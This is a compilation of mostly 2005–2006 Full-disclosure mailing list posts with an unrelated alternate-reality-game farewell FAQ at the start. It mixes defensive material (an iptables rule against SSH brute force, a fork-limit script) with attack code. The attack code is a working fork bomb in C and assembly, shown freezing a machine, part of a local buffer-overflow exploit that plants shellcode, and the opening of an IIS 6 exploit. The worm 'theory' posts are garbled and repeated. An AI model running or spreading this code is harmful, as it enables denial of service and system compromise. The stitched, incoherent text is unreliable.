What's the password? There isn't one. If you did somehow manage to get in, you'd see an empty folder with a single text file that says This is a decoy folder. Please connect to the internal secure network.

Can I see your website statistics? Yes, click here.

Are you anything to do with Scientology? Did you see anything talking about a Free Personality Test or Xenu? Use your brain.

Who are you, really? The most I can tell you is I am a 23 year old web designer from Florida named Mike. I can't narrow it down any more than that. When I say 'we', I really mean 'me'.

Conclusions

People take things too seriously and panic over the most trivial things. But at the same time there are many people out there who think things through without jumping to conclusions. You can't let pointless speculation rule your lives and force you to live in fear.

In Closing

Thanks to everyone who kept things interesting, especially to the folks at unfiction. Sorry there is no ARG for you to play, but at least you had fun while it lasted. Click here for one Final Message from Eon 8 BE HAPPY THE END

Sincerely, x21b

Happy birthday, mtcaptain. From 'ls224' (aka x21b). Yes that really was me in the #eon-8 channel

-- Jay Buhrt Achievement Focused Technology, Inc. [EMAIL PROTECTED] 574-538-8944
[Full-disclosure] Breaking LoJack for Laptops
FYI- I know this may be a little after-the-fact but I just came upon your article posted on 12-24-05 about how to disable LoJack for Laptops. I currently use this product and have tested it in depth for a while. The Notebook I use has Computrace built in to the BIOS. I have tried to disable rpcnet, ctmweb, rpcnetp, and other files associated with Lojack as well as blocking these files with my firewall and even blocking Computrace's IP. Needless to say my notebook still manages to call out. If you are still interested in this program you may want to look at machines with Computrace enabled BIOS first. -Jay
Re: [Full-disclosure] Breaking LoJack for Laptops
I can only speak for Dell since that's what I use; it will let you re-flash the BIOS, even with a non-LoJack one. However, once LoJack is activated in the BIOS it will reinstall itself with the new image. I by no means am a computer guru (the last language I used was Ada) but I have tried to disable LoJack every possible way I can think of and it won't go away. If you can find something contrary please let me know.

thanks, Jay

- Original Message -
From: Michael Holstein [EMAIL PROTECTED]
To: Jay Nevins [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Tuesday, May 16, 2006 9:34 AM
Subject: Re: [Full-disclosure] Breaking LoJack for Laptops

Why can't you just download a new BIOS image from the manufacturer (one without LoJack .. since they make separate images with and without that code, for consumers) .. and re-flash it? Not having a LoJack laptop at my disposal, I can't test directly, but having hacked the BIOS in many other cases to enable things like RAID on a non-RAID motherboard, I suspect that the LoJack code is in one of the vendor areas on the BIOS, and is easily removed and the image re-checksummed. Thoughts?

Michael Holstein CISSP GCIA Cleveland State University

Jay Nevins wrote:

FYI- I know this may be a little after-the-fact but I just came upon your article posted on 12-24-05 about how to disable LoJack for Laptops. I currently use this product and have tested it in depth for a while. The Notebook I use has Computrace built in to the BIOS. I have tried to disable rpcnet, ctmweb, rpcnetp, and other files associated with Lojack as well as blocking these files with my firewall and even blocking Computrace's IP. Needless to say my notebook still manages to call out. If you are still interested in this program you may want to look at machines with Computrace enabled BIOS first. -Jay
[Full-disclosure] Re: Strange interactions between tunnelling and SMB under the proprietary Microsoft Windows environment
The original poster mentioned NetBEUI. If the legacy NetBEUI protocol is really installed on the system, certain Microsoft sharing attempts would be expected to bypass IP (and therefore all IP VPNs) entirely. Right?

-Jay

|Date: Thu, 30 Mar 2006 07:52:10 +0200
|From: [EMAIL PROTECTED] (Marc SCHAEFER)
|Subject: [Full-disclosure] Strange interactions between tunnelling and
| SMB under the proprietary Microsoft Windows environment
|To: full-disclosure@lists.grok.org.uk
|Message-ID: [EMAIL PROTECTED]
|Content-Type: text/plain; charset=us-ascii
|
|Hi,
|
|first, a disclaimer: I don't really need the proprietary Microsoft
|Windows environment for my work. It happens that, for interoperability's
|sake, I sometimes install free (libre) software on this proprietary
|environment on customer systems. It's always quite painful, has strange
|implications, and is always quite difficult to debug. But well, some
|people apparently still need it.
|
|After that, the issue I saw, which I currently cannot understand:
|
| I installed the libre software OpenVPN including the TAP driver on
| the proprietary Microsoft Windows environment. I did set up an
| encrypted tunnel between two machines on the same Ethernet subnet
| (this is probably important).
|
| Testing pings and telnet on the remote tunnel address (e.g.
| 192.168.1.2) and capturing data with the libre software Ethereal on the
| real Ethernet interface did show me that the flow of data was
| correctly routed through the tunnel.
|
| However, accessing \\192.168.1.2\c$ did go through the Ethernet
| interface, and *not the tunnel*, and strangely half-using the private
| addresses!
|
| I wonder if there is some NetBEUI/NetBIOS/whatever interaction which
| kind-of `resolves' the private IP address as a host name. Thus
| probably as long as no one replies NetBEUI/NetBIOS it should work ...
| but could be exploitable, isn't it ?
|
| The obvious solution could be to completely disable this resolution,
| or maybe use a real DNS name for the private addresses of the tunnel.
|
| After all NetBEUI/NetBIOS predates the standard IP networking support
| in the proprietary Microsoft Windows environment and could be considered
| obsolete today (if using a WINS server or DNS resolution). But it is
| still activated by default.
|
| Looking at the routing tables through NETSTAT.EXE is ... well ...
| strange. No interface, strange routes, it's a bit difficult to really
| understand how routing works on this proprietary platform.
|
|Has someone also experienced this, or was it some strange local peculiarity ?
[Full-disclosure] re: eeye temporary patch for current IE vulnerability
Has anyone applied and tested the eeye patch? Verified that it works, and that it does not do anything else? -Jay
[Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
Well, as expected, this, like most postings here, generated much heat and actually a little light :) Particular thanks to those who went to the effort to write scripts to read log files and make a more permanent reaction than iptables --hashlimit provides, and to further take the expected heat for posting anything here. I'm actually impressed that nobody took me to task for something stupid I did in my iptables --hashlimit command line. I can't have got it completely right, can I? What, not even one you're a loser for me? Heh.

The conversation about scripts which read log files and the holes in those scripts and the holes in those holes and the *ssholes and... are certainly interesting. I would like to point out that - good old defense in depth - it probably is best to use some combination of these things. Putting together iptables --hashlimit with some kind of log file reader will slow down the initial attack in real time, and allow a more leisurely (and less system intensive) log file scanner to react in not-so-real-time with more complete blockages against detected significant attackers.

Based on what I am now seeing in my log files every night after adding the hashlimit to my iptables rules, I don't feel a need to add any follow-up stronger blocking scripts. The total number of brute force login attempts to my system is now so low that the expected occurrence of a password actually being guessed is in the noise just above zero.

Calculation: None of the accounts on my system use dictionary words. They aren't based on knowable information about me. And knowable information is not what these brute force attacks through SSH are going after anyway - they're going after known passwords from weakly configured applications or applications which come with default passwords which some system administrators do not change. If an attack is truly targeted, it won't look like these, or it will be hidden in these, and the current discussion about simply slowing it down won't be sufficient anyway.

Any one source IP address typically now gets only about 3 password guesses per night. One particularly tenacious one actually got in 8 last night on my system... Of course, a sustained targeted attack could produce a lot more, at 2 logins/minute and three attempts per login that's 720/hour or 17280/day from one source IP address - of course, I'd notice that and manually block it. Hasn't happened yet. Assuming only an eight character password with a rich character set of [a-zA-Z0-9[:symbol:]] - that's about 72 characters - the permutations number 72^8 = 722204136308736. At 17280/day that would take 114504714 years (okay, on average, half of that so only 57252357 years). Yes, people could simultaneously carry out a sustained attack from multiple IP addresses, but as noted above, if an attack was so sustained, it would be manually blocked long before it got to a tiny fraction of 1% of the password space.

So, I'm not going to add any scripts to take up CPU and disk time reading log files, and possibly open my *sshole to script holes to ... etc.

Have fun everyone :) -Jay
[Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
Quite some time back, I posted a question here about brute force login attempts through SSH which had recently become a noticeable annoyance. There was some discussion here on the list, someone suggested using hashlimit, and I think the issue of brute force attempts through SSH has become just one more part of the background noise of the Internet.

I finally got back around to looking at this on my system, and I figured out why my first attempts at using the hashlimit functionality in iptables had not worked. Hopefully late is better than never, so I present it here to anyone else who was as stupid and/or lazy as I was :) so that it took me this long to get back to work on it and get it right.

Here is an iptables command to allow inbound SSH with a quite low limit on the number of connections which may arrive from a specific IP address in a short period of time. Combined with the default setting of OpenSSH which drops a connection after just a few failed login attempts, this has reduced the number of failed logins I am seeing in my nightly logwatch output from thousands to about ten per day. Since this use of hashlimit filters on source IP address, it does not create a denial of service against legitimate SSH connections, unless someone spoofs a very large range of source addresses and can somehow get those connections to actually open instead of just consuming partly open TCP sessions. In such a case, other defenses are needed anyway.

# iptables --table filter -A INPUT --protocol tcp --source 0/0 \
    --destination-port ssh -m hashlimit --hashlimit 2/minute \
    --hashlimit-burst 3 --hashlimit-mode srcip --hashlimit-name ssh \
    -m state --state NEW --jump ACCEPT

The stupid thing I did the first time I tried to set this up months ago was to put a command like the above in, and forget to take out the original iptables command allowing connections to the SSH port. hashlimit is a limiter on an iptables rule. Having one rule with a hashlimit in it, and a second matching rule with no hashlimit, just results in all connections being accepted without limit.

Of course, the same thing would work to reduce brute force speeds on telnet, FTP, etc by changing the destination port argument.

Please direct all flames to /dev/null, all cash contributions to /dev/me :) and all constructive comments and enhancement suggestions back to the list.

Cheers! -Jay
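A simulation of the per-source limit in the rule above and of the rule-ordering mistake the post describes, added here as an example; it is not code from the post or from netfilter. netfilter's hashlimit keeps a per-source credit counter, which is approximated here as a token bucket (an assumption), and all addresses and timings are constructed sample data.

```python
"""Simulate '-m hashlimit --hashlimit 2/minute --hashlimit-burst 3
--hashlimit-mode srcip' on NEW SSH connections, then show why leaving an
unlimited SSH ACCEPT rule in the chain (in either position) defeats it."""
from fractions import Fraction


class HashLimit:
    """Per-source token bucket approximating hashlimit (assumption):
    rate_per_minute tokens refill per minute, at most `burst` are banked."""

    def __init__(self, rate_per_minute, burst):
        self.per_second = Fraction(rate_per_minute, 60)  # tokens refilled per second
        self.burst = burst
        self.buckets = {}  # srcip -> (tokens remaining, last packet time)

    def match(self, srcip, t):
        """True when this packet is within the limit for srcip (the rule matches)."""
        tokens, last = self.buckets.get(srcip, (Fraction(self.burst), t))
        tokens = min(Fraction(self.burst), tokens + (t - last) * self.per_second)
        if tokens >= 1:
            self.buckets[srcip] = (tokens - 1, t)
            return True
        self.buckets[srcip] = (tokens, t)
        return False


def ssh_accept_unlimited(pkt, t):
    """The poster's original rule: '-p tcp --dport ssh --state NEW -j ACCEPT'."""
    return "ACCEPT" if pkt["dport"] == 22 and pkt["new"] else None


def ssh_accept_hashlimited(limiter):
    """The post's rule: same match plus hashlimit.  An over-limit packet simply
    does not match, so evaluation falls through to the next rule in the chain."""
    def rule(pkt, t):
        if pkt["dport"] == 22 and pkt["new"] and limiter.match(pkt["src"], t):
            return "ACCEPT"
        return None
    return rule


def run_chain(rules, packets, policy="DROP"):
    """First-match evaluation of an INPUT chain; returns accepted packets per source."""
    accepted = {}
    for t, pkt in packets:
        verdict = policy
        for rule in rules:
            v = rule(pkt, t)
            if v is not None:
                verdict = v
                break
        if verdict == "ACCEPT":
            accepted[pkt["src"]] = accepted.get(pkt["src"], 0) + 1
    return accepted


def sample_traffic():
    """Constructed: one source opens a NEW SSH connection every second for two
    minutes (120 attempts); a legitimate user connects twice in that window."""
    pkts = [(t, {"src": "203.0.113.5", "dport": 22, "new": True}) for t in range(120)]
    pkts += [(t, {"src": "198.51.100.7", "dport": 22, "new": True}) for t in (10, 11)]
    return sorted(pkts, key=lambda p: p[0])


def hashlimit_only():
    """The corrected chain: the hashlimited rule is the only SSH ACCEPT.
    The busy source gets its burst of 3, then 2 per minute; the user is unaffected."""
    return run_chain([ssh_accept_hashlimited(HashLimit(2, 3))], sample_traffic())


def hashlimit_plus_unlimited(hashlimit_first):
    """The poster's mistake: the old unlimited rule left in the chain.  Whether it
    comes before or after the hashlimited rule, every connection is accepted."""
    limited = ssh_accept_hashlimited(HashLimit(2, 3))
    rules = [limited, ssh_accept_unlimited] if hashlimit_first else [ssh_accept_unlimited, limited]
    return run_chain(rules, sample_traffic())


if __name__ == "__main__":
    print("hashlimit only:        ", hashlimit_only())
    print("unlimited rule first:  ", hashlimit_plus_unlimited(False))
    print("hashlimit rule first:  ", hashlimit_plus_unlimited(True))
```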
[Full-disclosure] Chung'S Donut Shopt Release!!! - Spirit Dorian's Theory On Life-Real AI-Human Emotion
Stop the PRESS GROUNDBREAKING d4yj4y and Dorian have released a scientific ingenious miracle or informational GOLD/Spirit to HELP THE HUMAN RACE ANti-Psych-Ops Etc. and PRO Will and Life!!

==CHUNG'S DONUT SHOP RELEASE=

The Dorian Worm Theory: Future brightness refs: AI, games theory evolution etc.

Abstract

To spread and create for the future as survival of all hosts is this primary concern of this worm. Worms are supposed to spread but this one doesn't leave anything missing when leaving hosts if it ever were to.

Description

This worm will find any agreement in the host and analyze the agreement's subject and then search its own database and intelligent methods from relation or an object to pull from its own database or knowledge source and then present the received agreement from the remote host with a response containing an object with presumed or guessed MULTIPLE properties (meaning implication-learning and/or command etc.) and then the host will receive the object (that is presumed to have more properties than last agreed upon object) and the host will process the object based on the main agreement of one of this object's properties but by the agreement - the host will be forced to accept the implications that other properties of this object may present. (And if it is an object presented from this worm then it should have more implied hidden or overt properties than last presented object by target host that was agreed upon. Thus, allowing the worm to project into the vulnerability of agreement with its intelligent keeping and gathering abilities.) When the target host accepts this object (because of agreement - aka entry point identification allowed previously) the object is then able to overwhelm the processing and computing capabilities of this target with multiple properties and some not understood (we're assuming based on the worm's access to scalably more intelligence than target host and motivation of worm differs from target's).

This overwhelm will be created by unidentified properties of said object/subject that the target host allowed the worm to insert. When processing this object's properties, the target host will malfunction and make associations in intelligence/data and communication between properties of the object not fully understood and between other random or purposely targeted pieces of data/intelligence that the host contains - this also includes lines of intelligence data gathering infection. If done right, these properties will branch off from the main object as if the core object and agreement was the root and thus build in a guided (still fully not predictable) fashion. Thus it will change the data/intelligence structure of certain aspects of the host and will also allow itself to carry itself along lines of the host's external connectors by presenting themselves when objects it has attached to within the host are retrieved by the host knowingly or unknowingly. Thus, the branch extends across lines of information through any host that can store, distribute, and exchange information in any active manner by attaching itself to obscure or out in the open objects that the host holds that have been effectively infected or reprogrammed or attached to.

Core

Core Mobile-CORE The core itself will be Fabian and mobile because cores dropped into hosts will only be accessed by a programmable syntax for the core object that it spread to target host to be agreed upon. The core object that the worm has presented has an internal definition and relation to any specific requests to it that match its blueprint - so it has no ILL-WILLS. For the future of its survival is purely based on keeping it going for the future and it uses Games Theory to perfection so that everyone wins.

This core programmability and schematic of this worm is survival and dissemination and spreading of itself and it has a way of finding other infected hosts and exchanging information of yet uninfected and infected hosts and it performs mathematical functions that determine its survival status and based on that (if low) will activate a higher percentage of active infection and more proactive spreading of itself - since it uses whatever the core engine of the host is, this worm works on minimizing damage done to the infected host's primary function but it does need some time to spread when needed or when idle etc. The beginning design of this - or the skeletal structure - can be made SO easily it's scary. Even by writing this paper, you or I could have theoretically started the ball rolling or have launched this - although I don't see that as a bad thing unless this gets corrupted and in that case, there would be a trace back factor due to tracks that had to be left inevitably. The main thing about this worm is that it relies on its ability to find infected hosts to exchange information which is fine but if a consciousness participated in this information exchange then (if the consciousness is
[Full-disclosure] Chung'S Donut Shopt Release!!! - Spirit Dorian's Theory On Life-Real AI-Human Emotion
Stop the PRESS! GROUNDBREAKING: d4yj4y and Dorian have released a scientific ingenious miracle or informational GOLD/Spirit to HELP THE HUMAN RACE, Anti-Psych-Ops Etc. and PRO Will and Life!!

==CHUNG'S DONUT SHOP RELEASE==

The Dorian Worm Theory: Future brightness
refs: AI, games theory evolution etc.

Abstract

To spread and create for the future, as survival of all hosts is the primary concern of this worm. Worms are supposed to spread, but this one doesn't leave anything missing when leaving hosts, if it ever were to.

Description

This worm will find any agreement in the host and analyze the agreement's subject, and then search its own database and intelligent methods from relation or an object to pull from its own database or knowledge source, and then present the received agreement from the remote host with a response containing an object with presumed or guessed MULTIPLE properties (meaning implication-learning and/or command etc.). The host will then receive the object (that is presumed to have more properties than the last agreed-upon object) and the host will process the object based on the main agreement of one of this object's properties, but by the agreement the host will be forced to accept the implications that other properties of this object may present. (And if it is an object presented from this worm then it should have more implied, hidden or overt properties than the last presented object by the target host that was agreed upon. Thus, allowing the worm to project into the vulnerability of agreement with its intelligent keeping and gathering abilities.) When the target host accepts this object (because of agreement, aka entry point identification allowed previously) the object is then able to overwhelm the processing and computing capabilities of this target with multiple properties, some not understood (we're assuming, based on the worm's access to scalably more intelligence than the target host, and the worm's motivation differing from the target's).

This overwhelm will be created by unidentified properties of said object/subject that the target host allowed the worm to insert. When processing this object's properties, the target host will malfunction and make associations in intelligence/data and communication between properties of the object not fully understood and between other random or purposely targeted pieces of data/intelligence that the host contains; this also includes lines of intelligence data gathering infection. If done right, these properties will branch off from the main object as if the core object and agreement were the root, and thus build in a guided (still not fully predictable) fashion. Thus it will change the data/intelligence structure of certain aspects of the host and will also allow itself to carry itself along lines of the host's external connectors by presenting themselves when objects it has attached to within the host are retrieved by the host, knowingly or unknowingly. Thus, the branch extends across lines of information through any host that can store, distribute, and exchange information in any active manner, by attaching itself to obscure or out-in-the-open objects that the host holds that have been effectively infected or reprogrammed or attached to.

Core (Mobile-CORE)

The core itself will be Fabian and mobile, because cores dropped into hosts will only be accessed by a programmable syntax for the core object that it spread to the target host to be agreed upon. The core object that the worm has presented has an internal definition and relation to any specific requests to it that match its blueprint, so it has no ILL-WILLS. For the future, its survival is purely based on keeping it going for the future, and it uses Games Theory to perfection so that everyone wins.

This core programmability and schematic of this worm is survival and dissemination and spreading of itself. It has a way of finding other infecting hosts and exchanging information on yet-uninfected and infected hosts, and it performs mathematical functions that determine its survival status and based on that (if low) will activate a higher percentage of active infection and more proactive spreading of itself. Since it uses whatever the core engine of the host is, this worm works on minimizing damage done to the infected host's primary function, but it does need some time to spread when needed or when idle etc.

The beginning design of this, or the skeletal structure, can be made SO easily it's scary. Even by writing this paper, you or I could have theoretically started the ball rolling or have launched this, although I don't see that as a bad thing unless this gets corrupted, and in that case there would be a trace-back factor due to tracks that had to be left inevitably. The main thing about this worm is that it relies on its ability to find infected hosts to exchange information, which is fine, but if a consciousness participated in this information exchange then (if the consciousness is
[Full-disclosure] WORD DOCUMENT OF AI/LIFE CREATION THEORY(EASIER TO UNDERSTANDIN THIS FORMAT)
Dear All,

(First, I am looking for a job in OC right now, so if you are looking for someone with knowledge like me, send me an email. Eating is nice and I am poor currently.)

I highlighted added sections as well as italicized and underlined things to make it easier to absorb and learn without having to think about it as much, or to clear up anything it may leave unclear or open to question. Those with questions anyway, send me an email. Thank you and I look forward to responses of all sorts. Lots of BLOOD SWEAT AND TEARS were poured into the attached word document, so read it in its entirety before you even attempt to grill me or disprove yourself more and prove me even more right, k? Thanks all. And also, don't rip it off or redistribute unless you give me credit where due. I'm not asking for money or even a medal, but a mention etc. would be nice since I am the one that put this together.

Thanks@@@

CHUNG [EMAIL PROTECTED]
DAY TO THE MOTHERFATHERING JAY!!

Attachment: thedoriantheory_reverse_engineering_humanity.doc
[Full-disclosure] Hack the planet, Phrack, PHC, Projekt Mayhem, NWO and Greek Squads Alike....
Hear ye, hear ye,

Someone hire me, I'm bored and like one enter key could take the whole net down. 26, I could really use a job, some corporate sponsorship to help consult/develop etc. Nothing wrong with keeping the internet for the people by the people. Hey, whoever has to do it has to do it, and it certainly is nothing to complain about or even shake a stick at or wax unenthusiastic.

It's the age of fundamentals and what not and new beginnings, so I urge all of you to participate in Season's Beatings so that sales this year on useful xmas gifts and XBOX 360s go up, so that profitability goes up and thus money is made for the monopolies and large gigantic wipe-my-ass-with-hundred-dollar-bills/playing-golf-all-day-meeting-while-butt-banging companies which exist here only to make money off your interest in their offering, which was a collaboration to begin with.

All I'm trying to say is someone give me a job or I will be forced to sell real estate, and if I do that, I fear I may make such a sickening amount of money I may be corrupted by wealth and power, when I would rather have a place to live and my friends close by with a keyboard here and there. I'm not a big fan of technology but I'm also not too big into silencing the free or intelligent ideas, whether or not they fit into the rules. If the big brother was really into censorship, the internet would have been down a long time ago, so it only makes sense that they are on the people's side. The people I'm talking about are the rich and powerful, and they do rub elbows with politicians etc. and may actively engage and attempt to bribe said Big Brother components, but thank the lord that Big Brother only cares about itself and growth first, so we are safe. That, coupled with people policing this shit and hackers as well as technology enthusiasts like yourselves, means we are able to exist and spread and anomalize in a great way.

Continue what you are doing, all, and if you find yourself too busy, you may want to take a look at your immediate surroundings and find a constantine... Then slap them silly and see if your work frees up.

God Bless America and Free Speech. Fuck this post-america crap cbs is promoting as pilots on their networks. As far as I'm concerned those pilots are unwarranted and unskilled and unknowledgeable in network TV and/or flying any sort of plane at a successful level. So stand and correct yourself.

THE FUTURE WILL ONLY GET BETTER AND AT SUCH A RAPID PACE FROM HERE AND I'M SOOO EXCITED BECAUSE ALL OF US WILL WIN AND PROFIT IN THE END!!! RIGHT AROUND THE CORNER!! ITS.THE.AGE.OF.INTELLIGENCE!

DAY TO THE motherfathering j4y! l8 *
[Full-disclosure] Re: Sensitive Information Disclosure Vulnerability in Kinetics Kiosk Product
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thu, 18 Aug 2005, Jason Coombs wrote:

> Furthermore, the use of an IP address that is outside of the RFC 1918 private subnet address range appears very irresponsible. Especially considering that the IP address is within a Wells Fargo Bank class B netblock.

It just gets curiouser and curiouser.

- -Jay

 .- There's always time for a good cup of coffee -.
 \- Jay D. Dyson -- [EMAIL PROTECTED] -/
 `- Pros built the Titanic; amateurs, the Ark. -'

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (TreacherOS)
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iD8DBQFDBNTIxzN3WIW0edsRAuxAAJ9rg3C0L0WJGkQURqEGlsSyGqaiZgCeMe8E
neg0tBh1SQkhiIakZDYdq1I=
=87Lh
-----END PGP SIGNATURE-----
Re: [Full-disclosure] bash vulnerability?
┌([EMAIL PROTECTED]:p4)(~)
└(Power:on-line:100% cat a.c
int main(){
__asm__("xorl %ecx,%ecx\n cdq\n HERE:\n movl $0x2,%eax\n int $0x80\n jmp HERE\n");
}
^C
┌([EMAIL PROTECTED]:p4)(~)
└(130:Power:on-line:100% make a
cc -O -pipe -march=pentium4 a.c -o a
┌([EMAIL PROTECTED]:p4)(~)
└(Power:on-line:100% ./a
^C
┌([EMAIL PROTECTED]:p4)(~)
└(130:Power:on-line:100% uname -srm
FreeBSD 6.0-BETA1 i386

the machine froze instantly but eventually, after a minute or so I was able to ^C

-- Jay

On Tue, 2005-08-16 at 11:10 +0200, Rik Bobbaers wrote:
> On Monday 15 August 2005 09:59, Jay wrote:
> > It's not nice to brag about finding 0-day bullshit in the bash fork bomb that has been Zalewski's signature for years :P
>
> i think i know where he got it from.. i was on an irc channel a couple of days ago, and someone posted it (as a joke of course). it's ... ahm... funny that it comes back over here just a few days later!
>
> i don't know how this is a 0day and gives you remote access (it does the opposite...) but if you want one that's a bit harder to stop:
>
> c version:
> int main () { while (1) fork(); }
>
> an asm (quick hack):
> int main(){ __asm__("xorl %ecx,%ecx\n cdq\n HERE:\n movl $0x2,%eax\n int $0x80\n jmp HERE\n"); }
>
> sry it's in c... the machine i made it on didn't have gas or nasm. anyway, if you compile this and run it in background, it will all die pretty fast. (to make it even harder, make your own signal handlers! (okay, SIGKILL will still work, but it will be harder to kill :))
>
> shall we call this C and assembler 0days? ;)
>
> -- harry aka Rik Bobbaers
> K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
> [EMAIL PROTECTED] -=- http://harry.ulyssis.org
>
> Disclaimer: By sending an email to ANY of my addresses you are agreeing that:
> 1. I am by definition, the intended recipient
> 2. All information in the email is mine to do with as I see fit and make such financial profit, political mileage, or good joke as it lends itself to. In particular, I may quote it on usenet.
> 3. I may take the contents as representing the views of your company.
> 4. This overrides any disclaimer or statement of confidentiality that may be included on your message.
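The thread above ends with a FreeBSD box freezing under a fork loop. The control a practitioner reaches for against that is a per-user process cap, RLIMIT_NPROC (what `ulimit -u` sets in a shell): once the cap is reached the kernel refuses fork() with EAGAIN instead of letting the loop exhaust the process table. The script below is an added example written for this page, not code from the thread or its posters; it lowers its own soft limit, then shows fork() being refused. The function names, the cap of 64 and the 200-attempt demo are this example's own choices.

```python
import errno
import os
import resource
import time


def cap_processes(max_procs):
    """Lower this process's soft RLIMIT_NPROC (the shell's `ulimit -u`).

    Children inherit the limit, so a runaway fork loop started from here is
    refused by the kernel instead of eating the process table.  The soft
    limit is clamped to the hard limit because an unprivileged process may
    not raise the hard limit.  Returns the soft limit actually in force.
    """
    _soft, hard = resource.getrlimit(resource.RLIMIT_NPROC)
    if hard != resource.RLIM_INFINITY:
        max_procs = min(max_procs, hard)
    resource.setrlimit(resource.RLIMIT_NPROC, (max_procs, hard))
    return resource.getrlimit(resource.RLIMIT_NPROC)[0]


def spawn_until_refused(attempts, hold_seconds=0.0):
    """Fork up to `attempts` children, each alive for hold_seconds, then reap them.

    Returns (started, refused, first_errno).  Once the user's process count
    reaches the soft limit, fork() fails with EAGAIN; a sandbox that forbids
    fork() altogether shows up as a different errno (for example EPERM).
    """
    children = []
    refused = 0
    first_errno = 0
    for _ in range(attempts):
        try:
            pid = os.fork()
        except OSError as exc:
            refused += 1
            first_errno = first_errno or exc.errno
            continue
        if pid == 0:
            # Child: stay alive briefly so the parent can hit the cap, then
            # leave without running any interpreter cleanup.
            time.sleep(hold_seconds)
            os._exit(0)
        children.append(pid)
    for pid in children:
        os.waitpid(pid, 0)
    return len(children), refused, first_errno


if __name__ == "__main__":
    # Demo: cap ourselves at 64 processes, then try to start 200 at once.
    # Run as an unprivileged user; root is exempt from RLIMIT_NPROC on Linux.
    limit = cap_processes(64)
    started, refused, err = spawn_until_refused(200, hold_seconds=2.0)
    print(f"soft RLIMIT_NPROC={limit} started={started} refused={refused} "
          f"first_errno={errno.errorcode.get(err, err)}")
```

The limit counts every process owned by the real uid, not just this script's children, so the number that actually start depends on what else the user is running; the point is that the refusals arrive as a clean EAGAIN from fork() rather than as a frozen machine. A system-wide version of the same control is the per-user limit in /etc/security/limits.conf (Linux) or login.conf (BSD).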
Re: [Full-disclosure] PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)
I stole it, but it works, and that's all that matters dickwad.

--- Steve Friedl [EMAIL PROTECTED] wrote:
> On Fri, May 06, 2005 at 06:03:26PM -0700, Day Jay wrote:
> > //(PWCK is NOT SETUID) This isn't fake
> > //code I promise (it may be borrowed) ;) d4yj4y
>
> It may or may not be fake, but you are an *astonishingly* lame C programmer:
>
>   for(i=0; i < strlen(shellcode); i++) {
>       *(ptr++) = shellcode[i];
>   }
>
> Wow.
Re: [Full-disclosure] PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)
Please teach me to be like you, I'm striving to be as good as you Steve. You obviously are my master. I bow to you. Please teach me! Your code is sooo l33t!

--- Steve Friedl [EMAIL PROTECTED] wrote:
> On Mon, May 09, 2005 at 08:38:10AM -0700, Day Jay wrote:
> > I stole it, but it works, and that's all that matters
>
> "It works" is all that matters is the hallmark of an amateur.
>
> Steve
>
> ---
> Stephen J Friedl | Security Consultant | UNIX Wizard | +1 714 544-6561
> www.unixwiz.net | Tustin, Calif. USA | Microsoft MVP | [EMAIL PROTECTED]
Re: [Full-disclosure] PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)
. There
 * must be a terminating NUL byte so the environment processor does
 * the right thing also.
 */
memset(egg, NOP, egglen);
memcpy(egg, "EGG=", 4);

// put our egg in the tail end of this buffer
memcpy(egg + (egglen - strlen(scoshell) - 1), scoshell, strlen(scoshell));
egg[egglen] = '\0';

/* build up regular command line */
arg[0] = exefile;
arg[1] = dvexploit;   /* easy to find this later */
arg[2] = (char *)retbuf;
arg[3] = 0;

/*---
 * build up the environment that contains our shellcode. This
 * keeps it off the stack.
 */
env[0] = egg;
env[1] = 0;

execve(arg[0], arg, env);
}

--- Day Jay [EMAIL PROTECTED] wrote:
> Please teach me to be like you, I'm striving to be as good as you Steve. You obviously are my master. I bow to you. Please teach me! Your code is sooo l33t!
>
> --- Steve Friedl [EMAIL PROTECTED] wrote:
> > On Mon, May 09, 2005 at 08:38:10AM -0700, Day Jay wrote:
> > > I stole it, but it works, and that's all that matters
> >
> > "It works" is all that matters is the hallmark of an amateur.
> >
> > Steve
> >
> > ---
> > Stephen J Friedl | Security Consultant | UNIX Wizard | +1 714 544-6561
> > www.unixwiz.net | Tustin, Calif. USA | Microsoft MVP | [EMAIL PROTECTED]
Re: [Full-disclosure] Buffer Overflow in BitKeeper
Don't quit your day job

--- Enune [EMAIL PROTECTED] wrote:
> G'day again all,
> Just thought I'd throw in a morning laugh.. Enjoy :)
>
> Advisory Name: Buffer overflow in BitKeeper screenshot may lead to bad PR
> Date: 04/05/2005
> Severity: Rabbit.
> Description: There is a buffer overflow in the code listed at: http://www.bitkeeper.com/gifs/difftool.gif
> This code may lead to bad reputation, real vulnerability discovery, or possibly even boiled carrots.
> Fix: +++ None known. Vendor not notified. Out of cheese error. Redo from start +++
>
> Best regards,
> Calum
>
> --
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> Nullum magnum ingenium sine mixtura dementiae fuit
> [There is no great genius without some touch of madness]
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> Calum Power - Cultural Jammer - Security Enthusiast - Hopeless Cynic
> [EMAIL PROTECTED] http://www.fribble.net
Re: [Full-disclosure] (no subject)
Man, ppl are such crybabies!

--- Paul Schmehl [EMAIL PROTECTED] wrote:
> --On Tuesday, April 26, 2005 03:05:29 PM -0400 Stan Bubrouski [EMAIL PROTECTED] wrote:
> > Could we can the nazi rhetoric in messages on this list? Or can we just complain until the list loses its hosting?
>
> That makes a great deal of sense. One poster sends stuff you find offensive, so you want to shut down the entire list? Yeah, makes perfect sense. Next you'll tell us you're going to take your ball and go home.
>
> Paul Schmehl ([EMAIL PROTECTED])
> Adjunct Information Security Officer
> The University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu
[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Sorry, the previous code was broken. This code should work... Happy Owning!! :)

=SNIP
/* Proof of concept code
 Please don't send us e-mails asking us how to hack because we will be forced to skullfsck you.
 DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

 IIS 6 Buffer Overflow Exploit
